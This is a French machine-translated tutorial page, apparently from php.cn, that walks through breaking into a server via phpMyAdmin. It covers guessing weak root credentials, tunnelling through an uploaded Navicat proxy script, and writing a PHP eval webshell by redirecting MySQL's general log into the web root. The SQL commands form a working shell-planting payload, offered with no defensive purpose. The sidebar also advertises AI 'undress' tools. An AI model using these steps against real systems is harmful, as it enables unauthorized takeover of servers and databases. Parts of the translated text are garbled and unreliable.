communauté
Apprendre
Bibliothèque d'outils
Outils d'IA
Loisirs
recherche
Français
Table des matières
Analysez d'abord un certain site via l'analyse du répertoire et constatez que phpmyadmin existe. Essayez le mot de passe root faible : root a de la chance d'entrer.
Maison base de données phpMonAdmin Partager un test d'intrusion par Phpmyadmin

Partager un test d'intrusion par Phpmyadmin

藏色散人
藏色散人
Mar 12, 2021 am 11:55 AM
phpmyadmin

Ce qui suit est un test d'intrusion de Phpmyadmin de la colonne tutoriel phpmyadmin. J'espère qu'il sera utile aux amis dans le besoin !

Analysez d'abord un certain site via l'analyse du répertoire et constatez que phpmyadmin existe. Essayez le mot de passe root faible : root a de la chance d'entrer.

Essayer d'utiliser la connexion à la base de données de Navicate renvoie que la connexion à distance à la base de données est interdite :

Cependant, l'exécution de la commande à distance a constaté que le port 3306 local était ouvert, il a donc essayé de se connecter via un proxy :

Téléchargez le fichier ntunnel_mysql.php (script de proxy de base de données) depuis le répertoire d'installation de Navicat vers n'importe quel répertoire de site Web du serveur cible (téléchargé plus tard après getshell)

Télécharger dans le répertoire D:/phpStudy/WWW pour accéder à http:/ /XXX/ntunnel_mysql.php Le test a réussi

Effectuez un test de connexion :

(À ce moment, ouvrez Navicat localement pour configurer le Connexion http. L'adresse du canal ici est l'URL que vous avez visitée ci-dessus. Pour le dire franchement, du côté de l'agent, cochez la case pour utiliser le codage base64 pour empêcher waf de causer des problèmes. Ensuite, écrivez localhost comme nom d'hôte et écrivez le lnmp01. compte utilisateur de la base de données locale comme mot de passe du compte, car vous devez vous connecter à lnmp01 mysql local)

Phpmyadmin Get Shell :

Utilisation des fichiers journaux

mysql version 5.0 et supérieure créera des fichiers journaux et modifiera le contenu global du journal. Les variables peuvent également être utilisées avec getshell. Mais vous devez également disposer d’autorisations de lecture et d’écriture sur les journaux générés. 

set global general_log = "ON";   #当开启general时,所执行的sql语句都会出现在WIN-30DFNC8L78A.log文件那么,如果修改general_log_file的值,那么所执行的sql语句就会对应生成进而getshell
SET global general_log_file='D:/phpStudy/WWW/test1234.php';  #对应就会生成test1234.php文件
select &#39;<?php eval($_POST[2019]);?>&#39;;          #将一句话木马写入test1234.php文件
Copier après la connexion


Connexion du couteau à hacher :

Ce qui précède est le contenu détaillé de. pour plus d'informations, suivez d'autres articles connexes sur le site Web de PHP en chinois!

Déclaration de ce site Web
Le contenu de cet article est volontairement contribué par les internautes et les droits d'auteur appartiennent à l'auteur original. Ce site n'assume aucune responsabilité légale correspondante. Si vous trouvez un contenu suspecté de plagiat ou de contrefaçon, veuillez contacter admin@php.cn

Outils d'IA chauds

Undresser.AI Undress

Undresser.AI Undress

Application basée sur l'IA pour créer des photos de nu réalistes

AI Clothes Remover

AI Clothes Remover

Outil d'IA en ligne pour supprimer les vêtements des photos.

Undress AI Tool

Undress AI Tool

Images de déshabillage gratuites

Clothoff.io

Clothoff.io

Dissolvant de vêtements AI

AI Hentai Generator

AI Hentai Generator

Générez AI Hentai gratuitement.

Afficher plus

Article chaud

R.E.P.O. Crystals d'énergie expliqués et ce qu'ils font (cristal jaune)
2 Il y a quelques semaines By 尊渡假赌尊渡假赌尊渡假赌
Repo: Comment relancer ses coéquipiers
1 Il y a quelques mois By 尊渡假赌尊渡假赌尊渡假赌
Hello Kitty Island Adventure: Comment obtenir des graines géantes
4 Il y a quelques semaines By 尊渡假赌尊渡假赌尊渡假赌
Combien de temps faut-il pour battre Split Fiction?
3 Il y a quelques semaines By DDD
R.E.P.O. Enregistrer l'emplacement du fichier: où est-il et comment le protéger?
3 Il y a quelques semaines By DDD
Afficher plus

Outils chauds

Bloc-notes++7.3.1

Bloc-notes++7.3.1

Éditeur de code facile à utiliser et gratuit

SublimeText3 version chinoise

SublimeText3 version chinoise

Version chinoise, très simple à utiliser

Envoyer Studio 13.0.1

Envoyer Studio 13.0.1

Puissant environnement de développement intégré PHP

Dreamweaver CS6

Dreamweaver CS6

Outils de développement Web visuel

SublimeText3 version Mac

SublimeText3 version Mac

Logiciel d'édition de code au niveau de Dieu (SublimeText3)

Afficher plus

Sujets chauds

Où se trouve l'entrée de connexion pour la messagerie Gmail ?
7342
9
Tutoriel Java
1627
14
Tutoriel CakePHP
1352
46
Tutoriel Laravel
1265
25
Tutoriel PHP
1210
29
Afficher plus
Related knowledge
Comment définir la clé primaire dans phpmyadmin Comment définir la clé primaire dans phpmyadmin Apr 07, 2024 pm 02:54 PM

La clé primaire d'une table est constituée d'une ou plusieurs colonnes qui identifient de manière unique chaque enregistrement de la table. Voici les étapes pour définir une clé primaire : Connectez-vous à phpMyAdmin. Sélectionnez la base de données et la table. Cochez la colonne que vous souhaitez utiliser comme clé primaire. Cliquez sur "Enregistrer les modifications". Les clés primaires offrent des avantages en matière d’intégrité des données, de vitesse de recherche et de modélisation des relations.

Où existe la base de données wordpress ? Où existe la base de données wordpress ? Apr 15, 2024 pm 10:39 PM

La base de données WordPress est hébergée dans une base de données MySQL qui stocke toutes les données du site Web et est accessible via le tableau de bord de votre fournisseur d'hébergement, FTP ou phpMyAdmin. Le nom de la base de données est lié à l'URL du site Web ou au nom d'utilisateur, et l'accès nécessite l'utilisation des informations d'identification de la base de données, notamment le nom, le nom d'utilisateur, le mot de passe et le nom d'hôte, qui sont généralement stockés dans le fichier « wp-config.php ».

Comment ajouter des clés étrangères dans phpmyadmin Comment ajouter des clés étrangères dans phpmyadmin Apr 07, 2024 pm 02:36 PM

L'ajout d'une clé étrangère dans phpMyAdmin peut être réalisé en suivant ces étapes : Sélectionnez la table parent qui contient la clé étrangère. Modifiez la structure de la table parent et ajoutez de nouvelles colonnes dans "Colonnes". Activez les contraintes de clé étrangère et sélectionnez la table et la clé de référencement. Définir les opérations de mise à jour/suppression. Sauvegarder les modifications.

Quel est le mot de passe du compte phpmyadmin ? Quel est le mot de passe du compte phpmyadmin ? Apr 07, 2024 pm 01:09 PM

Le nom d'utilisateur et le mot de passe par défaut pour PHPMyAdmin sont root et vides. Pour des raisons de sécurité, il est recommandé de modifier le mot de passe par défaut. Méthode pour changer le mot de passe : 1. Connectez-vous à PHPMyAdmin ; 2. Sélectionnez « privilèges » 3. Saisissez le nouveau mot de passe et enregistrez-le. Lorsque vous oubliez votre mot de passe, vous pouvez le réinitialiser en arrêtant le service MySQL et en modifiant le fichier de configuration : 1. Ajoutez la ligne skip-grant-tables ; 2. Connectez-vous à la ligne de commande MySQL et réinitialisez le mot de passe root ; la table des autorisations ; 4. Supprimez la ligne skip-grant-tables, redémarrez le service MySQL.

Où est le journal phpmyadmin ? Où est le journal phpmyadmin ? Apr 07, 2024 pm 12:57 PM

Emplacement par défaut des fichiers journaux PHPMyAdmin : Linux/Unix/macOS:/var/log/phpmyadminWindows : C:\xampp\phpMyAdmin\logs\ Objectif du fichier journal : Dépannage de la sécurité de l'audit

Comment supprimer une table de données dans phpmyadmin Comment supprimer une table de données dans phpmyadmin Apr 07, 2024 pm 03:00 PM

Étapes pour supprimer une table de données dans phpMyAdmin : Sélectionnez la base de données et la table de données ; cliquez sur l'onglet « Action » ; sélectionnez l'option « Supprimer » ; confirmez et effectuez l'opération de suppression.

pourquoi l'accès à phpmyadmin a été refusé pourquoi l'accès à phpmyadmin a été refusé Apr 07, 2024 pm 01:03 PM

Raisons et solutions d'accès refusé par phpMyAdmin : Échec de l'authentification : Vérifiez si le nom d'utilisateur et le mot de passe sont corrects. Erreur de configuration du serveur : ajustez les paramètres du pare-feu et vérifiez si le port de la base de données est correct. Problème d'autorisations : accorder aux utilisateurs l'accès à la base de données. Délai d'expiration de la session : actualisez la page du navigateur et reconnectez-vous. Erreur de configuration phpMyAdmin : vérifiez le fichier de configuration et les autorisations du fichier pour vous assurer que les modules Apache requis sont activés. Problème de serveur : attendez un moment et réessayez ou contactez votre fournisseur d'hébergement.

À quel type de vulnérabilité appartient la vulnérabilité phpmyadmin ? À quel type de vulnérabilité appartient la vulnérabilité phpmyadmin ? Apr 07, 2024 pm 01:36 PM

phpMyAdmin est sensible à plusieurs vulnérabilités, notamment : 1. Vulnérabilité d'injection SQL ; 2. Vulnérabilité de script intersite (XSS) ; 3. Vulnérabilité d'exécution de code à distance (RCE) ; 4. Vulnérabilité d'inclusion de fichiers locaux (LFI) ; Vulnérabilité ; 6. Vulnérabilité d’élévation de privilèges.

See all articles